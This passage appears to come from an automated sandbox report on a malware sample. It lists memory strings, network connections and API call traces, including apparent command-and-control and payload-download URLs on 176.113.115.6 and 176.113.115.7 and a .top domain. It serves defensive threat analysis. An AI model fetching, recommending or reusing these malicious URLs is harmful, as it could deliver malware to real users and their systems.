                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpU/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpX/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpd.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpk.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpl/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpq.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpr/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpuz
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpy/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6l
                                    Source: powershell.exe, 00000005.00000002.1215195505.0000000004D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/527224533/ReK7Ewx.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/527224533/ReK7Ewx.exe81dac97d7aee7
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/527224533/ReK7Ewx.exeshqos.dll
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/5419477542/ADFoyxP.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/5419477542/ADFoyxP.exeN
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/5526411762/CgmaT61.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/5526411762/yUI6F6C.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exe1dac97d7aee7f
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exe:
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exeat
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exes
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6691015685/V0Bt74c.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6691015685/V0Bt74c.exe.
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exe.AppDataBj
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exeD
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exeR
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exep
                                    Source: powershell.exe, 00000008.00000002.1316835189.00000287A8B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                    Source: powershell.exe, 00000005.00000002.1219648140.0000000007319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro(
                                    Source: powershell.exe, 00000005.00000002.1219942069.00000000073A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microy
                                    Source: svchost.exe, 0000000A.00000002.2865035263.0000021259A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                    Source: svchost.exe, 0000000A.00000003.1203356516.00000212598A8000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                    Source: edb.log.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                    Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                    Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                    Source: svchost.exe, 0000000A.00000003.1203356516.00000212598A8000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                    Source: svchost.exe, 0000000A.00000003.1203356516.00000212598A8000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                    Source: svchost.exe, 0000000A.00000003.1203356516.00000212598DD000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                    Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                    Source: ReK7Ewx.exe, 0000001C.00000002.3641720190.0000000000409000.00000002.00000001.01000000.00000013.sdmp, ReK7Ewx.exe, 0000001C.00000000.3045218076.0000000000409000.00000002.00000001.01000000.00000013.sdmp, ReK7Ewx[1].exe.14.dr, ReK7Ewx.exe.14.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                    Source: powershell.exe, 00000005.00000002.1217606643.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1311737367.00000287A0A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                    Source: powershell.exe, 00000008.00000002.1234070143.0000028790C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000005.00000002.1215195505.0000000004B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1234070143.0000028790A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                    Source: Amcache.hve.54.drString found in binary or memory: http://upx.sf.net
                                    Source: powershell.exe, 00000008.00000002.1234070143.0000028790C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000029.00000000.3120996848.00000000002F5000.00000002.00000001.01000000.00000014.sdmp, Digital.37.dr, EduGeniusX.com.41.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                    Source: powershell.exe, 00000005.00000002.1219942069.00000000073A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                                    Source: powershell.exe, 00000005.00000002.1219942069.00000000073A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.Q
                                    Source: powershell.exe, 00000008.00000002.1234070143.0000028790A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 00000005.00000002.1215195505.0000000004B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                    Source: powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: svchost.exe, 0000000A.00000003.1203356516.0000021259952000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                    Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                    Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                    Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                    Source: svchost.exe, 0000000A.00000003.1203356516.0000021259952000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                                    Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garagedrootz.top/
                                    Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp, V0Bt74c.exe, 00000033.00000002.3542600563.0000000001002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garagedrootz.top/oPsoJAN
                                    Source: V0Bt74c.exe, 00000033.00000002.3527792268.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garagedrootz.top/oPsoJANX
                                    Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garagedrootz.top/oPsoJANer
                                    Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garagedrootz.top:443/oPsoJAN
                                    Source: powershell.exe, 00000008.00000002.1234070143.0000028790C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000005.00000002.1215195505.0000000005115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1234070143.000002879163C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
                                    Source: powershell.exe, 00000005.00000002.1217606643.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1311737367.00000287A0A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: svchost.exe, 0000000A.00000003.1203356516.0000021259952000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                                    Source: edb.log.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                                    Source: EduGeniusX.com.41.drString found in binary or memory: https://www.globalsign.com/repository/0
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49809 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49814 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49816 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49817 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49819 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49822 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49821 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49825 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49826 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49828 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49830 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49832 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49833 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49836 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49842 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49846 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49850 version: TLS 1.2
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0049EAFF
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0049ED6A
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0049EAFF
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0048AA57
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004B9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_004B9576

                                    System Summary

                                    barindex
                                    Binary is likely a compiled AutoIt script file
                                    Source: random.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                                    Source: random.exe, 00000000.00000002.1170353812.00000000004E2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4d431a09-e
                                    Source: random.exe, 00000000.00000002.1170353812.00000000004E2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 